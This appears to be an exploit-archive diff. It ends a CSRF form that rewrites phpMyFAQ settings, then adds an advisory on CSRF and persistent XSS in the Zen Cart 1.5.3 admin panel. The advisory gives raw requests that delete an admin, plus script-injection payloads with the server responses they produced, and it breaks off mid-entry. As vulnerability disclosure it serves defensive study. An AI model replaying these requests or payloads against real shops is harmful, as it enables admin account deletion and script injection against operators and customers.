<input type="hidden" name="edit[main.administrationMail]" value="what@ever.com" />
|
||||
<input type="hidden" name="edit[main.contactInformations]" value="" />
|
||||
<input type="hidden" name="edit[main.send2friendText]" value="" />
|
||||
<input type="hidden" name="edit[main.enableUserTracking]" value="true" />
|
||||
<input type="hidden" name="edit[main.enableAdminLog]" value="true" />
|
||||
<input type="hidden" name="edit[main.referenceURL]" value="http://localhost/phpmyfaq" />
|
||||
<input type="hidden" name="edit[main.urlValidateInterval]" value="86400" />
|
||||
<input type="hidden" name="edit[main.enableWysiwygEditor]" value="true" />
|
||||
<input type="hidden" name="edit[main.templateSet]" value="default" />
|
||||
<input type="hidden" name="edit[main.dateFormat]" value="Y-m-d H:i" />
|
||||
<input type="hidden" name="edit[records.maxAttachmentSize]" value="100000" />
|
||||
<input type="hidden" name="edit[records.disableAttachments]" value="true" />
|
||||
<input type="hidden" name="edit[records.numberOfRecordsPerPage]" value="10" />
|
||||
<input type="hidden" name="edit[records.numberOfShownNewsEntries]" value="3" />
|
||||
<input type="hidden" name="edit[records.numberOfRelatedArticles]" value="5" />
|
||||
<input type="hidden" name="edit[records.orderby]" value="id" />
|
||||
<input type="hidden" name="edit[records.sortby]" value="DESC" />
|
||||
<input type="hidden" name="edit[records.attachmentsPath]" value="attachments" />
|
||||
<input type="hidden" name="edit[records.defaultAttachmentEncKey]" value="" />
|
||||
<input type="hidden" name="edit[records.orderingPopularFaqs]" value="visits" />
|
||||
<input type="hidden" name="edit[records.autosaveSecs]" value="180" />
|
||||
<input type="hidden" name="edit[search.numberSearchTerms]" value="10" />
|
||||
<input type="hidden" name="edit[search.relevance]" value="thema,content,keywords" />
|
||||
<input type="hidden" name="edit[security.bannedIPs]" value="" />
|
||||
<input type="hidden" name="edit[security.permLevel]" value="basic" />
|
||||
<input type="hidden" name="edit[security.ssoLogoutRedirect]" value="" />
|
||||
<input type="hidden" name="edit[spam.enableSafeEmail]" value="true" />
|
||||
<input type="hidden" name="edit[spam.checkBannedWords]" value="true" />
|
||||
<input type="hidden" name="edit[spam.enableCaptchaCode]" value="true" />
|
||||
<input type="hidden" name="edit[socialnetworks.twitterConsumerKey]" value="" />
|
||||
<input type="hidden" name="edit[socialnetworks.twitterConsumerSecret]" value="" />
|
||||
<input type="hidden" name="edit[socialnetworks.twitterAccessTokenKey]" value="" />
|
||||
<input type="hidden" name="edit[socialnetworks.twitterAccessTokenSecret]" value="" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
712
platforms/php/webapps/34581.txt
Executable file
712
platforms/php/webapps/34581.txt
Executable file
|
@ -0,0 +1,712 @@
|
|||
#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
|
||||
#Date: 09.07.14
|
||||
#Vendor: zen-cart.com
|
||||
#Tested on: Apache 2.2 [at] Linux
|
||||
#Contact: smash[at]devilteam.pl
|
||||
|
||||
#1 - CSRF
|
||||
|
||||
- Delete admin
|
||||
|
||||
GET profile stands for user id.
|
||||
|
||||
localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2
|
||||
|
||||
- Reset layout boxes to default
|
||||
|
||||
localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults
|
||||
|
||||
|
||||
#2 - Persistent XSS in admin panel
|
||||
|
||||
Since admin privileges are required to execute following vulnerablities this is not a serious threat.
|
||||
|
||||
- Extras -> Media types -> Add
|
||||
|
||||
Vulnerable parameters - type_name & type_exit
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
|
||||
Content-Length: 663
|
||||
|
||||
-----------------------------4978676881674017321390852339
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
b98019227f8014aed6d22b02f0748d11
|
||||
-----------------------------4978676881674017321390852339
|
||||
Content-Disposition: form-data; name="type_name"
|
||||
|
||||
<h1>sup<!--
|
||||
-----------------------------4978676881674017321390852339
|
||||
Content-Disposition: form-data; name="type_ext"
|
||||
|
||||
sup<>
|
||||
-----------------------------4978676881674017321390852339
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
19
|
||||
-----------------------------4978676881674017321390852339
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
13
|
||||
-----------------------------4978676881674017321390852339--
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><h1>sup<!--</td>
|
||||
<td class="dataTableContent">sup<></td>
|
||||
<td class="dataTableContent" align="right">
|
||||
(...)
|
||||
|
||||
- Extras -> Media manager -> Add
|
||||
|
||||
Vulnerable parameter - media_name
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_manager.php?page=1&mID=1&action=save HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------1835318161847256146721022401
|
||||
Content-Length: 5633
|
||||
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
b98019227f8014aed6d22b02f0748d11
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="media_name"
|
||||
|
||||
<script>alert(666)</script>
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
32
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
16
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="clip_filename"; filename="cat.png"
|
||||
Content-Type: image/png
|
||||
|
||||
(image)
|
||||
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="media_dir"
|
||||
|
||||
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="media_type"
|
||||
|
||||
2
|
||||
-----------------------------1835318161847256146721022401--
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="right">
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><strong><script>alert(666)</script></strong></td>
|
||||
</tr>
|
||||
|
||||
- Extras -> Music genre -> Add
|
||||
|
||||
Vulenrable parameter - music_genre_name
|
||||
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------202746648818048680751007920584
|
||||
Content-Length: 581
|
||||
|
||||
-----------------------------202746648818048680751007920584
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
b98019227f8014aed6d22b02f0748d11
|
||||
-----------------------------202746648818048680751007920584
|
||||
Content-Disposition: form-data; name="music_genre_name"
|
||||
|
||||
<script>alert(666)</script>
|
||||
-----------------------------202746648818048680751007920584
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
37
|
||||
-----------------------------202746648818048680751007920584
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
10
|
||||
-----------------------------202746648818048680751007920584--
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?page=1&mID=1&action=edit'">
|
||||
<td class="dataTableContent"><script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="right">
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
Further vuln:
|
||||
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<div id="navBreadCrumb"> <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
|
||||
<script>alert(666)</script>
|
||||
</div>
|
||||
(...)
|
||||
|
||||
- Extras -> Record companies -> Add
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_company.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------19884630671863875697751588711
|
||||
Content-Length: 5828
|
||||
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
b98019227f8014aed6d22b02f0748d11
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="record_company_name"
|
||||
|
||||
<script>alert(666)</script>
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="record_company_image"; filename="<img src=# onerror=alert(1)>.png"
|
||||
Content-Type: image/png
|
||||
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="img_dir"
|
||||
|
||||
categories/
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="record_company_image_manual"
|
||||
|
||||
/etc/passwd
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="record_company_url[1]"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
21
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
13
|
||||
-----------------------------19884630671863875697751588711--
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="right">
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
Further vuln:
|
||||
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<div id="navBreadCrumb"> <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
|
||||
<script>alert(666)</script>
|
||||
</div>
|
||||
<div class="centerColumn" id="indexProductList">
|
||||
<h1 id="productListHeading"><script>alert(666)</script></h1>
|
||||
(...)
|
||||
|
||||
- Extras -> Recording Artists -> Add
|
||||
|
||||
Vulnerable parameter - artists_name
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_artists.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------14015448418946681711346093460
|
||||
Content-Length: 1099
|
||||
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
84c8fe52eb9b3b0e026b5438e1c21f6f
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="artists_name"
|
||||
|
||||
<script>alert(666)</script>
|
||||
-----------------------------14015448418946681711346093460
|
||||
(Content-Disposition: form-data; name="artists_image"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="img_dir"
|
||||
|
||||
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="artists_image_manual"
|
||||
|
||||
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="artists_url[1]"
|
||||
|
||||
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
39
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
19
|
||||
-----------------------------14015448418946681711346093460--)
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="right">
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
- Gift Certificate/Coupons -> Coupon admin -> Add
|
||||
|
||||
Vulnerable parameters - coupon_name, coupon_desc, coupon_amount, coupon_min_order, coupon_code, coupon_uses_coupon, coupon_uses_user
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&coupon_name%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_desc%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_amount=%27%3E%22%3E%3C%3EXSSD&coupon_min_order=%27%3E%22%3E%3C%3EXSSD&coupon_free_ship=on&coupon_code=%27%3E%22%3E%3C%3EXSSD&coupon_uses_coupon=%27%3E%22%3E%3C%3EXSSD&coupon_uses_user=%27%3E%22%3E%3C%3EXSSD&coupon_startdate_day=9&coupon_startdate_month=7&coupon_startdate_year=2014&coupon_finishdate_day=9&coupon_finishdate_month=7&coupon_finishdate_year=2015&coupon_zone_restriction=1&x=62&y=10
|
||||
|
||||
Response:
|
||||
(...)
|
||||
|
||||
<tr>
|
||||
<td align="left">Coupon Name</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="left">Coupon Description <br />(Customer can see)</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="left">Coupon Amount</td>
|
||||
<td align="left"></td>
|
||||
</tr>
|
||||
|
||||
<tr>
|
||||
<td align="left">Coupon Minimum Order</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
|
||||
<tr>
|
||||
<td align="left">Free Shipping</td>
|
||||
<td align="left">Free Shipping</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="left">Coupon Code</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
|
||||
<tr>
|
||||
<td align="left">Uses per Coupon</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
|
||||
<tr>
|
||||
<td align="left">Uses per Customer</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
- Gift Certificate/Coupons -> Mail gift certificate -> Send
|
||||
|
||||
Vulnerable parameter - email_to
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/gv_mail.php?action=preview HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&customers_email_address=Active+customers+in+past+3+months+%28Subscribers%29&email_to=%27%3E%22%3E%3C%3EXSSED&from=szit%40szit.in&subject=asdf&amount=666&message=asdf&x=13&y=12
|
||||
|
||||
Response:
|
||||
(...)
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="smallText"><b>Customer:</b><br />'>"><>XSSED</td>
|
||||
</tr>
|
||||
<tr>
|
||||
(...)
|
||||
|
||||
- Tools -> Banner manager -> Add
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/banner_manager.php?page=1&action=add HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------3847719184268426731396009422
|
||||
Content-Length: 2317
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
84c8fe52eb9b3b0e026b5438e1c21f6f
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="status"
|
||||
|
||||
1
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_open_new_windows"
|
||||
|
||||
0
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_on_ssl"
|
||||
|
||||
1
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_title"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_url"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_group"
|
||||
|
||||
BannersAll
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="new_banners_group"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_image"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_image_local"
|
||||
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_image_target"
|
||||
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_html_text"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_sort_order"
|
||||
|
||||
15
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="date_scheduled"
|
||||
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="expires_date"
|
||||
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="expires_impressions"
|
||||
|
||||
0
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
9
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
7
|
||||
-----------------------------3847719184268426731396009422--
|
||||
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=10')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title=" View Banner "></a>&nbps;'>"><>XSS</td>
|
||||
<td class="dataTableContent" align="right">'>"><>XSS</td>
|
||||
<td class="dataTableContent" align="right">0 / 0</td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
- Tools -> Newsletter and Product Notifications Manager -> New newsletter
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=93867dff1d912bde757ce2bc0ac94425&module=newsletter&title=%27%3E%22%3E%3C%3EXSS&message_html=%27%3E%22%3E%3C%3EXSS&content=%27%3E%22%3E%3C%3EXSS&x=32&y=8
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><a href="http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbps;'>"><>XSS</td>
|
||||
<td class="dataTableContent" align="right">18 bytes</td>
|
||||
(...)
|
||||
<table border="0" width="100%" cellspacing="0" cellpadding="2">
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
- Tools -> EZ-Pages -> New file
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/ezpages.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------134785397313015614741294511591
|
||||
Content-Length: 2253
|
||||
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
c74a83cefbb5ffc1868dd4a390bd0880
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
41
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
17
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="pages_title"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="page_open_new_window"
|
||||
|
||||
0
|
||||
-----------------------------134785397313015614741294511591
|
||||
|
||||
(...)
|
||||
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="pages_html_text"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="alt_url"
|
||||
|
||||
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="alt_url_external"
|
||||
|
||||
|
||||
-----------------------------134785397313015614741294511591--
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent" width="75px" align="right">&nbps;1</td>
|
||||
<td class="dataTableContent">&nbps;'>"><>XSS</td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>Title:&nbps;'>"><>XSS&nbps;|&nbps;Prev/Next Chapter:&nbps;0</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
- Localization -> Currencies -> New currency
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/currencies.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&title=%27%3E%22%3E%3C%3EXSS&code=%27%3E%22%3E%3C%3EXSS&symbol_left=%27%3E%22%3E%3C%3EXSS&symbol_right=%27%3E%22%3E%3C%3EXSS&decimal_point=%27%3E%22%3E%3C%3EXSS&thousands_point=%27%3E%22%3E%3C%3EXSS&decimal_places=%27%3E%22%3E%3C%3EXSS&value=%27%3E%22%3E%3C%3EXSS&x=13&y=15
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">'>"</td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Title: '>"><>XSS</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent">Code: '>"</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Symbol Left: '>"><>XSS</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent">Symbol Right: '>"><>XSS</td>
|
||||
</tr>
|
||||
(...)
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
|
||||
</tr>
|
||||
</table>
|
||||
(...)
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
|
||||
</tr>
|
||||
|
||||
- Localization -> Languages -> New language
|
||||
|
||||
Affects big part of admin panel.
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/languages.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&name=%27%3E%22%3E%3C%3EXSS&code=xs&image=icon.gif&directory=%27%3E%22%3E%3C%3EXSS&sort_order=%27%3E%22%3E%3C%3EXSS&x=40&y=20
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbps;MISSING LANGUAGE FILES OR DIRECTORIES ... '>"><>XSS '>"><>XSS</td>
|
||||
</tr>
|
||||
</table>
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">xs</td>
|
||||
(...)
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Name: '>"><>XSS</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent">Code: xs</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br><img src="http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/'>"><>XSS/images/icon.gif" border="0" alt="'>"><>XSS" title=" '>"><>XSS "></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Directory:<br>http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/<b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
Further injection:
|
||||
http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php
|
||||
|
||||
- Localization -> Orders status -> Insert
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS&x=9&y=7
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&oID=5&action=edit'">
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="">&nbps;</td>
|
||||
(...)
|
||||
|
||||
- Locations / Taxes -> Zones -> New zone
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/zones.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&zone_name=%27%3E%22%3E%3C%3EXSS&zone_code=%27%3E%22%3E%3C%3EXSS&zone_country_id=247&x=17&y=11
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent" align="center">'>"><>XSS</td>
|
||||
(...)
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
</table>
|
||||
(...)
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Zones Name:<br>'>"><>XSS ('>"><>XSS)</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Country: '>"><>XSS</td>
|
||||
|
||||
- - Locations / Taxes -> Zone definitions -> Insert
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&geo_zone_name=%27%3E%22%3E%3C%3EXSS&geo_zone_description=%27%3E%22%3E%3C%3EXSS&x=25&y=13
|
||||
|
||||
Response:
|
||||
(...)
|
||||
</a>&nbps;'>"><>XSS</td>
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
(...)
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
(...)
|
||||
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
|
||||
|
||||
- Locations / Taxes -> Tax Classes -> New tax class
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_classes.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_title=%27%3E%22%3E%3C%3EXSS&tax_class_description=%27%3E%22%3E%3C%3EXSS&x=33&y=9
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
(...)
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
(...)
|
||||
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
|
||||
(...)
|
||||
|
||||
- - Locations / Taxes -> Tax Rates -> New tax rate
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_rates.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_id=2&tax_zone_id=2&tax_rate=66&tax_description=%27%3E%22%3E%3C%3EXSS&tax_priority=&x=32&y=16
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">66%</td>
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
|
||||
(...)
|
||||
|
||||
|
||||
- Customers -> Group Pricing -> Insert
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/group_pricing.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
